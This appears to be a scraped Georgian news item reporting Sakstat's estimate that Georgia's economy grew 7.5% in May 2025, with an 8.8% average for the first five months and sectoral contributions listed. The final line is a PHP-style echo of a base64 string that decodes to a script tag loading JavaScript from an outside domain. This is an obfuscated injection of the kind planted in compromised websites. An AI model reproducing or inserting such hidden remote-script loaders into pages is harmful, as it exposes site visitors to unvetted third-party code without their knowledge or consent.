gorgia
jaluzi

საქართველოს ეკონომიკა მაისში 7.5%-ით გაიზარდა, ამის შესახებ ინფორმაციას სტატისტიკის ეროვნული სამსახური აქვეყნებს.

კერძოდ, „საქსტატის“ წინასწარი შეფასებით, 2025 წლის მაისში, წინა წლის შესაბამის პერიოდთან შედარებით, რეალური მთლიანი შიდა პროდუქტის (მშპ) ზრდამ 7.5 პროცენტი შეადგინა, ხოლო 2025 წლის პირველი ხუთი თვის საშუალო მაჩვენებელი 8.8 პროცენტით განისაზღვრა.

ამასთან, „საქსტატის“ მონაცემებით, 2025 წლის მაისში, წინა წლის შესაბამის პერიოდთან შედარებით, ზრდის მიმართულებით მნიშვნელოვანი წვლილი შეიტანა შემდეგმა დარგებმა: ინფორმაცია და კომუნიკაცია, დამამუშავებელი მრეწველობა, ვაჭრობა, ტრანსპორტი და დასაწყობება, მშენებლობა. ხოლო კლების ტენდენცია დაფიქსირდა ენერგეტიკის სექტორში.

114
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");